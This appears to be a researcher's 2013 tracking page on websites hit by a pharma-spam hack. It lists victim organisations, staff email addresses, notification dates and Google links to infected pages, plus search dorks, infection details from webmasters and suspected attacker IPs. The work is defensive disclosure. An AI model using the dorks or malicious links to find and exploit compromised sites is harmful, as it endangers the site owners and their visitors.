17. adelstjohnchurch.org.uk |
"Down for maintenance" but malware is still up | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=139&ved=0CGgQFjAIOIIB&url=http%3A%2F%2Fwww.adelstjohnchurch.org.uk%2F4.6.5%2Findex.php%2Fzyrb-viagra-online-ordering.php&ei=OFONUvySO8KciQLxgIGICw&usg=AFQjCNFkbkRRsacMYaMImbhh33lJkSEVTw&sig2=phMUywKSmMtI7v_99utLiA&bvm=bv.56988011,d.cGE |
18. tjus.org Embassy of Tajikistan to the USA |
http://www.tjus.org/component/content/article/13-slide-news/133-the-annual-message-of-the-president-of-the-republic-of-tajikistan-he-mr-emomali-rahmon-to-the-majlisi-oli-of-the-republic-of-tajikistan | |
19. un-grasp.org United Nations Great Ape Survival Project, Nairobi, Kenya |
grasp@unep.org info@bornfree.org.uk Notified on 11-25-13 |
www.un-grasp.org/?p=703 |
20. http://choctawindians.net/ Choctawhatchee High School Florida |
choctawweb@mail.okaloosa.k12.fl.us andersonk@mail.okaloosa.k12.fl.us Katherine.White@mail.okaloosa.k12.fl.us Notified on 11-25-13 |
www.choctawindians.net/brand-viagra-online-without-prescription/
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=265&ved=0CEoQFjAEOIQC&url=http%3A%2F%2Fwww.choctawindians.net%2Fbrand-viagra-online-without-prescription%2F&ei=0leNUsKnNcikiQK4qIGQBA&usg=AFQjCNEj2QGhtBnGxfleoXHHksnAeAwzFQ&sig2=AjpeEcNQJ-oe3YqedG-VYA&bvm=bv.56988011,d.cGE |
21. http://www.efig.eu.com/ UK |
info@efig.org.uk
Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=280&ved=0CHcQFjAJOI4C&url=http%3A%2F%2Fwww.efig.eu.com%2Fwhere-to-buy-viagra-in-singapore-pharmacy&ei=MlmNUs-bI-OUiALh7IDADw&usg=AFQjCNGVrrN67AujnfqqqaCmdg8B9h4ahw&sig2=qGqYrHfcXbhhAOihnFJCqw&bvm=bv.56987063,d.cGE |
22. http://nyslc.net/ New York State Lifeguard Corps |
none | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHIQFjAJ&url=http%3A%2F%2Fnyslc.net%2Findex.php%2Fwtlm-school%2520of%2520pharmacy%2520in%2520ontario%2520canada.php&ei=qVuNUqTaOKe9igKrtIDwDA&usg=AFQjCNG-PDdMqj27QB2GzE5hrn0gwp4tLg&sig2=Hkvo6PIbEVy0kr3_4z53WQ&bvm=bv.56987063,d.cGE |
23. RUTGERS.EDU New Jersey |
abuse@RUTGERS.EDU security@RUTGERS.EDU colhenry@rci.rutgers.edu james.breeding@rutgers.edu phenry@oldqueens.rutgers.edu Notified 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CFwQFjAG&url=http%3A%2F%2Fiamdn.rutgers.edu%2F~chapin%2Fwordpress%2Fwp-content%2Fplugins%2Fakismet%2F%3Fqewosoli%3DODc4%26lajywi%3Dosbon_representative_pump_erectile_dysfunction&ei=2V2NUo-EDaroiwKtzYD4Cg&usg=AFQjCNHXMIhavlNOHGML6advvKev4_eMAA&sig2=RKitik6bOVhEEnaOB4TlnQ&bvm=bv.56987063,d.cGE |
24. davisenergy.com California |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEIQFjADOAo&url=http%3A%2F%2Fdavisenergy.com%2F%3Fp%3Duk_viagra&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNGJpKpwKyp8FcyREBZ_7Pkmc1o4UA&sig2=COL7028lufdKNM-1Q92EeA&bvm=bv.56987063,d.cGE | |
25. iospress.nl Multinational |
editorial@iospress.nl iospress@accucoms.com theo@vandebilt.co.uk Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEoQFjAEOAo&url=http%3A%2F%2Fwww.iospress.nl%2Ffemale-viagra-jelly%2F&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNE2Mw3UMfx25HUkPpo9BER0tDPbig&sig2=66GB1Y1UBghBggU53rVI4g&bvm=bv.56987063,d.cGE |
26. ctvoterscount.org Connecticut |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFEQFjAFOAo&url=http%3A%2F%2Fwww.ctvoterscount.org%2F%3Fo%3Da1383&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNG73nDYuVOh706t0AtvgUR4MGiRMA&sig2=lfCRoSwak5DBJ1R_KZkhiA&bvm=bv.56987063,d.cGE | |
27. al-imanschool.org New York |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CE4QFjAD&url=http%3A%2F%2Fal-imanschool.org%2Fold%2Fhomework%2Fcheap-viagra-canadian.html&ei=nJCNUoznL8m3iwKc2IGQCA&usg=AFQjCNGqjNiTWaPPnkq-SobFhj26swhLqg&sig2=knHJ2JPW7GxtvVMXVeTC4Q&bvm=bv.56987063,d.cGE | |
28. valentinoachakdeng.org South Sudan |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0CEEQFjABOAo&url=http%3A%2F%2Fwww.valentinoachakdeng.org%2Fblog%2Ftest%2Fmarial-bai-secondary-school-summer-2011%2F&ei=iJGNUrn6FoWWiAL8w4HoCA&usg=AFQjCNGSp0KjbnCJ1dJrAhFbC-4zYBK8wg&sig2=Ga1IKFnBXkIpXo5GtEbLFw&bvm=bv.56987063,d.cGE | |
29. mlhsss.gov.gy Guyana |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&ved=0CDsQFjAAOBQ&url=http%3A%2F%2Fwww.mlhsss.gov.gy%2Findex.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D237%3Agovt-to-train-a-further-4000-early-school-leavers-in-2010%26catid%3D9%3Aindustrial-training&ei=l5KNUveuHcWviAKXiIGYAw&usg=AFQjCNEm7SOQ2W01DDi0J6MQVNLueLOO1g&sig2=AbC4eFFgzTCgIvn_iT03hA&bvm=bv.56987063,d.cGE | |
30. caterpillarsschool.com India |
info@caterpillarschoolschool.com Notified on 11-25-13 |
http://caterpillarsschool.com/catpresch/caterpiller/index.php?q=node/1028 |
31. qomchurch.org |
parishoffice@qomchurch.org Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHsQFjAJOB4&url=http%3A%2F%2Fwww.qomchurch.org%2Ffaith-formation%2Fvacation-bible-school.html&ei=zZONUsGvDMH9iwKhlYCgBg&usg=AFQjCNG-TYVhss0rzMo9rsjIPBAlmJEDgQ&sig2=HrJ5718E0uUTBABIDkIdmg&bvm=bv.56987063,d.cGE |
32. alchemytechniques.com North Carolina |
info@alchemytechniques.com Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=53&ved=0CEcQFjACODI&url=http%3A%2F%2Fwww.alchemytechniques.com%2Fhealing-school%2Fbeginning-structural-self-inquiry%2F&ei=_paNUvjMHeaxiwKzxYC4Dg&usg=AFQjCNGbhPox9rB7RqVRjRV4RcSyxj-lsw&sig2=OvpB88RHAxXTUPV-eQr5qA |
33. rabsonmanor.co.uk |
info@rabsonmanor.co.uk http://www.fifthape.co.uk/contact.php Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=58&ved=0CG4QFjAHODI&url=http%3A%2F%2Frabsonmanor.co.uk%2Fhknbcmfhypothyroidismandarrythmiachabans%2Fcullen-trinity-medical-school-st-babaramori-fratus.html&ei=_paNUvjMHeaxiwKzxYC4Dg&usg=AFQjCNGhomqReNg7bhyb-jnjGJqocK8LYw&sig2=jfNdgiLi98Jw8epjm72wjw |
34. fifthape.co.uk |
http://www.fifthape.co.uk/contact.php
Notified on 11-25-13 |
http://fifthape.co.uk/xdchrockland/patients-have-been-known-to-chew-straight-through-bwsze.html
http://fifthape.co.uk/xdchmetaclopromidejhamper/the-challenge-with-this-life-threatening-disease-systers.html http://fifthape.co.uk/xdchwheelcartsvertaalde/liposarcomas-in-this-region-as-primary-tumors-a-mesapotamia.html
|
35. lbhs.ca Lord Beaverbrook High School, Canada |
LordBeaverbrook@cbe.ab.ca BoardofTrustees@cbe.ab.ca ChiefSuperintendent@cbe.ab.ca corpsec@cbe.ab.ca Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=70&ved=0CHwQFjAJODw&url=http%3A%2F%2Fwww.lbhs.ca%2Fschool-clubs%2F&ei=eamNUr9OiISLAty6gOgF&usg=AFQjCNGu3kjLWK21kzW2Vb67M4BlRGa-2A&sig2=u0lxqihtoSB-qzOFalKJYw
|
36. damselsinsuccess.com |
php |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=85&ved=0CEkQFjAEOFA&url=http%3A%2F%2Fwww.damselsinsuccess.com%2Fwhy-some-women-are-taking-back-to-school-instead-of-work%2Fwomen-in-school-mailroom%2F&ei=AauNUsKIJKWUiAKS4YHQDA&usg=AFQjCNGDwTU64fNJbbRQtKqvl05Ws7kZqw&sig2=TyF8HZaMUE-uS_9OJQ5zkg
Uses Wordpress 3.7.1 and Plugin WP Missed Schedule 2013.1024.8888; both up-to-date. Also uses mailchimp, I cannot determine version. Uses contact-form-7; cannot determine version. Uses better-related plugin, v. 0.3.5? --current version is 0.4.3.4. Also linksalpha.com/widgets/buttons plugins for Facebook Open Graph and Google Plus. |
37. starbene.it |
php |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=91&ved=0CCsQFjAAOFo&url=http%3A%2F%2Fwww.starbene.it%2Ftag%2Fandrews-dance-school%3Fc3rhc%3D197602&ei=WquNUvHgEaf8iwKMlYHoCA&usg=AFQjCNF2mMnULd70T-lA69hjXRGuyVMqsQ&sig2=HKTFxLQ4PzqxGbmjZee2cQ
|
38. artloversnewyork.com |
nsmith0014@aol.com Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGMQFjAH&url=http%3A%2F%2Fwww.artloversnewyork.com%2Fzine%2Fcategory%2Fthe-bomb%2Fpage%2F14%2F&ei=WK2NUuCYAuSujAKs74GoCQ&usg=AFQjCNE1WXwlWnFy2vOPqz_9I2RK_N71rA&sig2=aMH7-xPXKRj0xAPWG__Kdw&bvm=bv.56987063,d.cGE
Wordpress 3.3.2 (current is 3.7.1); no apparent plug-ins |
39. auraltimes.com Blog abandoned since 2007, but still infected |
php |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CDoQFjACOAo&url=http%3A%2F%2Fauraltimes.com%2F%3Fp%3Dbuy_viagra_online_canadian_phamacy&ei=MK-NUp-sAeHFigLexYHgAQ&usg=AFQjCNHLukHxXjdzuXervSj6Sb7Vmczotw&sig2=_ELWsjyP_JXDk_Sm05EM9w&bvm=bv.56987063,d.cGE
|
http://www.whoismind.com/whois/securedata24.com.html
I therefore suspect that this infection comes about by automated exploitation, since there is at least one site that has obviously been abandoned since 2007 that is infected. I doubt the webmaster was clicking on links this year.
I have also seen several infected sites which have had the database crash, which may be due to the infection causing collateral damage.
intitle:viagra intitle:canadian "information security"
intitle:viagra intitle:kaiser
Organization | Emails | Malicious URL |
---|---|---|
1. rip.org.uk |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CF8QFjAF&url=http%3A%2F%2Fwww.rip.org.uk%2Fyqsa-order_viagra_online_canadian_pharmacy.php&ei=PDaOUuiRGIeliQLdkoGIDg&usg=AFQjCNHR4NZhIPhK0OVaojRWpCL20e01cw&sig2=46EQSTSYMkX3xBcLJpqqDg&bvm=bv.56988011,d.cGE | |
2. cbcmagazine.com Cleveland, Ohio |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CGIQFjAFOAo&url=http%3A%2F%2Fwww.cbcmagazine.com%2Findex.php%2Ftjem-viagra_generic_paypal_discount.php&ei=eDeOUpGnJ4GwiQKvhYGgBA&usg=AFQjCNGdRhwztb_lZ-SXnRtOkrOHQdwAnQ&sig2=hi1NTXCWOrxRx5mp8YlHOA&bvm=bv.56988011,d.cGE | |
3. Turkey |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=23&ved=0CEkQFjACOBQ&url=http%3A%2F%2Fyenerveyener.com%2Findex.php%2Fdpzt-female%2520viagra%2520order%2520on%2520web.php&ei=ATiOUrGWKMOGjAKf0oHYDQ&usg=AFQjCNG3tUFfORbWJmSAfIfEbTFdNbgvHQ&sig2=fH0bEdmSCIliOPuj8BtFwA&bvm=bv.56988011,d.cGE | |
4. mcm.edu Texas |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=36&ved=0CFAQFjAFOB4&url=http%3A%2F%2Fmy.mcm.edu%2F%3FTaki%3Dcheap-viagra-uk-paypal-drug&ei=ejiOUvmWMquZjALrmIHgBw&usg=AFQjCNFx5kXmNFD27aHEvZ8IdqL0cEkXOg&sig2=zuc5Zlakv5l8ZKpE9jfEMg&bvm=bv.56988011,d.cGE | |
5. procue.info Spain |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGYQFjAIOB4&url=http%3A%2F%2Fwww.procue.info%2Flqks-viagra%2520online%2520canadian%2520pharmacy%2520paypal%2520tablets.php&ei=ejiOUvmWMquZjALrmIHgBw&usg=AFQjCNHJ7hxjmOscuDIMFxwi41URdQXt4Q&sig2=bEPeCwyGfW1Vz4TcV0dMhA&bvm=bv.56988011,d.cGE | |
6. grw.co.nz |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=63&ved=0CD4QFjACODw&url=http%3A%2F%2Fwww.grw.co.nz%2Findex.php%2Fohav-how%2520to%2520get%2520viagra%2520over%2520the%2520counter.php&ei=NDqOUsK_JMvriQLwiYDABQ&usg=AFQjCNF-x9aHVnFahOnHE8M359njMgSFuw&sig2=_v2H5RRDYJQ4Sh5sMMAKZw&bvm=bv.56988011,d.cGE | |
7. virginia.edu Virginia |
abuse@virginia.edu security@virginia.edu compe@virginia.edu lowe@virginia.edu patricia@virginia.edu Notified 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CIABEBYwCA&url=http%3A%2F%2Fwww.career.virginia.edu%2Ffeeds_old%2Fplaylister%2F%3Fall%3Dviagra-kaiser%26is%3D1&ei=Bz-OUtaVIsaIiAK7roGADQ&usg=AFQjCNGSEjjrariwmaty0iuau_KguJ0pOA&sig2=T9C5pTLrj-PdnkNKRvMvpg&bvm=bv.56988011,d.cGE |
8. udg.edu Spain |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=99&ved=0CGcQFjAIOFo&url=http%3A%2F%2Flequia.udg.edu%2Fold%2Fthickbox%2F%3Frai%3Dkaiser-viagra%26cd%3D2&ei=1kKOUu6ODuOUiAKA1ID4Cw&usg=AFQjCNEfX3T-vDdXde0a4gz-pTJihmG3SQ&sig2=_fXXIY8W0aBSzf0GxyeLMg |
Thanks, Jared!
Thank you for your write up on KWC's site infection. We've been working to eradicate the virus, and think we've removed it now. We've been able to temporarily remove it in the past, but it reestablished itself. It also changed in the way it worked after we removed it once, which made it harder to track down. Originally it was using the htaccess file to rewrite browser details to Google and Yahoo, but then it switched to prepend a php file to every page using the php.ini file. There were several other access points they has created using php's eval command to post code to our server. We've, of course, removed those now and taken other preventative steps in the hope that it is gone for good now.I checked the first ten hits with this search, and they are no longer infected. Looks like KWC has it fixed!Your write up was very helpful, though, and I'm sharing this with you in the hope that it will help the other sites you've discovered to contain the same issue.
Jared Ehrenheim for KWC.edu
inurl:kwc.edu viagra
Thanks, Don!
I think your use of Google Dorks is useful, but not definitive. We used to rely heavily on Google Dorks and Google Alerts to keep an eye out for activity like this, but those tools have become increasingly unreliable over the last few years. As case in point, using the search you offer as an example (modified to single us out):I tested the first ten hits for this dork on 11-21-13, and they were all clean. So I think they got it cleaned off!inurl:uark.edu viagra-online-100mg
We were at first unable to locate any record of defacement (including the site you reported). We later located the following URL (still no sign of your reported site):
www.uark.edu/misc/space/viagra/?id=Buy-Viagra-online-100mg
However, that particular site has been off-line for some time, so any attack would be quite old. Today, the Google search again returns no results.
Another interesting point is that our hacked site did not use securedata24.com for redirect. Instead, it uses keycollector.pw, which was registered on 20 April, near the same time as securedata24.
Again, thank you for taking the time to alert us.
From Don Faulkner
inurl:uark.edu viagra
From Don Faulkner, UARK.EDU:
We saw no evidence of remote control or botnet-like behavior. The affected site did not house sensitive data.From Jared Ehrenheim, KWC.EDU:
I've also discover POST requests to one of the infected PHP files coming from two different Netherlands registered IP addresses: 46.249.58.18 and 95.211.111.7846.249.58.18 is marked as a spam source Spamhaus:I've blacklisted those, but I anticipate there are more.
http://www.mywot.com/en/scorecard/46.249.58.18
I can't find any reports of malicious activity from 95.211.111.78
What we really could use now is a sample of the malware. PCAP files of the traffic would be good too. If anyone at infected colleges can help, please email me: sbowne@ccsf.edu
I used these Google searches:
"viagra online 100mg" san francisco california
viagra Canadian san francisco california
san francisco intitle:viagra
Organization | Emails | Malicious URL |
---|---|---|
1. 12ozprophet.com NYC, I think |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CG4QFjAG&url=http%3A%2F%2Fwww.12ozprophet.com%2Fnews%2Fphotos_nyc_2nd_avenue_subway_construction%3Fmtjve%3D350000&ei=IDCQUsaIBc_3oASx2oHADw&usg=AFQjCNFQC18xz-rFE-3ZMXb423dWuEMJ_w&sig2=v2Q9ISoppnLGAMODwNdFtA&bvm=bv.56988011,d.cGU | |
2. http://www.ediblecommunities.com/ They have an office in San Francisco |
ediblesanfrancisco@gmail.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CFsQFjAGOAo&url=http%3A%2F%2Fwww.ediblecommunities.com%2Fcontent%2Fedible-stories.htm%3Fm%3D201008%26zwrpy%3D664050&ei=5TGQUrjkL9XroATKpIII&usg=AFQjCNF4qEKLcWjuDwsL3S4RfqAwWpkDIw&sig2=LU6d4sozjgv2fOVunTCOYQ&bvm=bv.56988011,d.cGU |
3. californiarowingclub.com Oakland |
Page is infected with JS.HideMe-J [Trj] | http://www.californiarowingclub.com/index.php/programs |
4. hpfirefighter.com North Carolina |
http://hpfirefighter.com/2013/08/video-sheds-light-on-flight-214-passengers-death/ | |
5. merolaopera.com |
Merola Opera Program War Memorial Opera House 301 Van Ness Avenue San Francisco, CA 94102-4509 USA Phone: 1.415.565.6427 Fax: 1.415.565.3254 Email: mop (at) sfopera.com Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CFMQFjAF&url=http%3A%2F%2Fmerolaopera.com%2Fstaff&ei=ejeQUq4q2OagBMGggqAG&usg=AFQjCNGhq8bXPIE0WA33s9k0Yb0pDMcMsg&sig2=WH0dfbpc94wNCNx5Oj6VvA |
6. lautze.com |
San Francisco Office (Main Office) 303 Second Street, Suite #950 San Francisco CA 94107 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGIQFjAH&url=http%3A%2F%2Fwww.lautze.com%2Flinks.html&ei=ejeQUq4q2OagBMGggqAG&usg=AFQjCNH44eFZ5TccxVHVJ4yumgzeIwwFYA&sig2=E8f2Qz8zEhw4ocV2wZGu0w |
7. webchaver.org NJ; a browser security product |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=25&ved=0CEcQFjAEOBQ&url=http%3A%2F%2Fwebchaver.org%2Fcanadian-online-pharmacy-viagra-no-prescription%2F&ei=YjmQUsCPNZDUoATB-4LQAQ&usg=AFQjCNHk15_HlSxWBiWdQ1zAINxAv4gWEg&sig2=uFh6AX5-yil6xvFuvye8nA | |
8. advancedhomeenergy.com |
1356 S 50th St, Richmond, CA 94804 Ph: (510) 540-4860 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CGYQFjAIOBQ&url=http%3A%2F%2Fwww.advancedhomeenergy.com%2Fhome&ei=YjmQUsCPNZDUoATB-4LQAQ&usg=AFQjCNHSO_MyJPjunQLz5sL9xcRWJL7U6Q&sig2=PwtC-mHr9KwnoQPBnGI9Tg |
9. mixeddimensions.com |
181 Fremont st., San Francisco, CA 94105 info@mixeddimensions.net Notified 11-25-13 |
mixeddimensions.com/?xb=594 Not the same infection, hosted locally |
10. ismrm.org |
International Society for Magnetic Resonance in Medicine 2030 Addison Street, 7th Floor Berkeley, CA 94704 USA Tel: +1 510-841-1899 Fax: +1 510-841-2340 info@ismrm.org Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHEQFjAJOB4&url=http%3A%2F%2Fwww.ismrm.org%2F13%2Ftp09.htm&ei=0TqQUpWLJczZoASLvoDIAw&usg=AFQjCNH3Mebg6q2RERfICm_v4cLaKXas9g&sig2=fDjkigFKsFZgTbut9vp4ng |
11. pinkberry.com |
3130 Wilshire Blvd, 4th Floor, Santa Monica, CA 90403 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=45&ved=0CEkQFjAEOCg&url=https%3A%2F%2Fwww.pinkberry.com%2Ffrozen-yogurt-store%2Fus%2Fca%2Flos-angeles%2F92%2Flax%3Fcglua%3D640342&ei=xjyQUuDDMNjmoATBoIKgBg&usg=AFQjCNGKOgdOmrs-gqHEkUSB-P_K5NSnAg&sig2=E9GC65JDjCFmxyPRgGsNFw |
12. enterprisecontinuity.com A cybersecurity company |
DISASTER RESOURCE GUIDE | PO Box 15243, Santa Ana, CA 92735 | TEL 714.558.8940 | FAX 714.558.8901 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=115&ved=0CEYQFjAEOG4&url=http%3A%2F%2Fwww.enterprisecontinuity.com%2F%3Fceisprernte279%3Dcanadian-pharmacy-viagra-100mg&ei=pj-QUvL7IsPzoATbxIDoAw&usg=AFQjCNGQ5CC0HXNIc6q7fS0cWOpd0nE9Cg&sig2=pmBWVzx3V-qzdleRDGMLqA |
13. metrostudy.com Washington, DC |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CDwQFjAC&url=http%3A%2F%2Fwww.metrostudy.com%2Fexternals%2Fskydeck-store%2Findex.php%3Fq%3Dbuy-viagra-in-san-francisco-77&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHha6MJd4ui5T4zTJYEBy-wHttktw&sig2=o9PbT6lWJhPJsSk3RtwDKQ&bvm=bv.56988011,d.cGU | |
14. rivnet.com Texas |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Frivnet.com%2Ffiles%2Fbuy-viagra-in-san-francisco.html&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNE4lowkUqpEG3tZ82JcxJsakQPaVA&sig2=8lKR4_vM_K4Vl7P-q0D4DA&bvm=bv.56988011,d.cGU | |
15. wwpinfo.com NJ |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CEMQFjAD&url=http%3A%2F%2Fwww.wwpinfo.com%2F%3Fmcofoinwpw249%3Dhow-to-obtain-viagra-san-francisco&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNEJK1yhkRK4aukYoSfoWyW4lS7BKg&sig2=Kzr3G7WSEIOkzBKh_CLwyQ&bvm=bv.56988011,d.cGU | |
16. www.3dogcreative.biz Web site not up yet, but already infected |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CEoQFjAE&url=http%3A%2F%2Fwww.3dogcreative.biz%2Fwp-content%2Fwp%2F%3Fp%3D151&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNGBPM1BB-Y5RHc9-W7dL9sacPs1jQ&sig2=nnhgoz27M7Sg5Y93T9fIUA&bvm=bv.56988011,d.cGU | |
17. columbiagreenhouse.com NY |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CFEQFjAF&url=http%3A%2F%2Fcolumbiagreenhouse.com%2Foldsite%2Fphotos%2F1%2F%3Ft%3D493&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHkz0Bfywio3VD3-Ynd3KpcDgOjEg&sig2=HfsekHrly84inOytQbJGrQ&bvm=bv.56988011,d.cGU | |
18. figurefinishing.com VA |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGQQFjAH&url=http%3A%2F%2Ffigurefinishing.com%2F%3Fbuy-viagra-in-san-francisco&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNEZSjIa7jlpLA6HFBootnF0wi_Y0Q&sig2=oiRHrs1DuDa_Fe1dYFTDiQ&bvm=bv.56988011,d.cGU | |
19. xoverland.com MT |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CGsQFjAI&url=http%3A%2F%2Fwww.xoverland.com%2Frssxvl.php%3Fl%3D92&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNGMAMJfrrAyKDMm0kDYlEC3Op-7rA&sig2=UXrgmCvBQ6HbJ05tZlStPw&bvm=bv.56988011,d.cGU | |
20. aaohn.org American Asociation of Occupational Health Nurses, FL |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHMQFjAJ&url=http%3A%2F%2Faaohn.org%2Fpharmacy.php%3Fproduct%3D10571&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHp1M3--3joxExUh6vcpzN88sFM1w&sig2=c0EJ8FK1aiS0T4H2pPEUBA&bvm=bv.56988011,d.cGU | |
21. chatsoft.com CLoud service provider, NJ |
info@chatsoft.com Not the same defacement, notified via Twitter on 11-23-13 or 11-14-13 |
http://www.chatsoft.com/solutions/datamanagement/index.html |
22. collin.edu Texas |
Notified 11-23-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFcQFjADOAo&url=http%3A%2F%2Fiws.collin.edu%2Fecoker%2Fimages%2Fbuy-viagra-san-francisco.html&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNFfhzXWWc7wMkf6Oe-rUPfcjLg8Cg&sig2=9snfjkM5uPqGeol1L9p3rA&bvm=bv.56988011,d.cGU |
23. yicca.org |
Site by redbulconsulting.com, a Swiss consulting firm
Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGgQFjAHOAo&url=http%3A%2F%2Fyicca.org%2Frssyic.php%3Fyic%3D484&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNE4kwVB_Glliiz4KPsHgqLT03PPPQ&sig2=oahZQdHFKdpnAQIQqld3gQ&bvm=bv.56988011,d.cGU |
24. nrc.ie Dublin, Ireland |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CHAQFjAIOAo&url=http%3A%2F%2Fnrc.ie%2Fbuy-viagra-san-francisco.html&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNErTeHURaWcjumbe_vJ-FYfUIMWDA&sig2=8AeBbQTgEq5-UiWYn8jOBw&bvm=bv.56988011,d.cGU | |
25. flobots.com Website by djcoffman.com |
djcoffman@gmail.com
Notified 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fflobots.com%2Fpfizer-viagra-discount%2F&ei=2T-RUv27OMffoAS864LAAQ&usg=AFQjCNEil6kk8PJIniIu6eVGY0_bpDDt6w&sig2=-KIeiwGbkeZWP0-rML1W1A&bvm=bv.56988011,d.cGU |
Protect Your WordPress Website from a Pharma Hack (2012)
Google Viagra Hack Hitting Websites Hard
Gumblar .cn Exploit – 12 Facts About This Injected Script (2009)
Viagra ads appearing in google search results (2009)
This forum thread seems to be about aa infection similar to the one I am seeing:
http://forum.avast.com/index.php?topic=131579.0
Rogues & Frauds « Canadian International Pharmacy Association
ohotdamn.com Redirects ~ canadian-pharmacy-24h.com
Buy Amitriptyline – canadian-pharmacy-24h.com
Discussion of this hacking technique from 2010
I used these Google searches:
inurl:UK intitle:viagra
inurl:uk intitle:viagra university
inurl:ac.uk intitle:viagra university
inurl:ac.uk intitle:viagra
@burrowingsec told me on Twitter about janet:
https://www.ja.net/support-advice/support/security-issues
So I notified them by email first ( service@ja.net ), rather than contacting each college individually.
That was a mistake. It is now 10 PM 11-26-13, and despite the promises at https://www.ja.net/support-advice/support/security-issues that they will respond within one or two hours, here I am, 36 hours after my first notification by email, 21 hours after @mark_s0 alerted them via Twitter, and 6 hours after my second notification by email. They have not responded to any of them, and the first 5 colleges on my list remain vulnerable. Ja.net is worse than useless, they just slow down repairs with their lies.
So I resume what I should have done in the first place, and contact the colleges directly.
Wow! That worked! The next day, 11-27-13, I tested them and 9/12 have been cleaned, apparently by deleting files or shutting off infected servers.
Organization | Emails | Malicious URL |
---|---|---|
1. www.targettravel.co.uk |
admin@targettravel.info abuse@targettravel.info security@targettravel.info Notified directly 11-26-13 Still infected 11-27-13 |
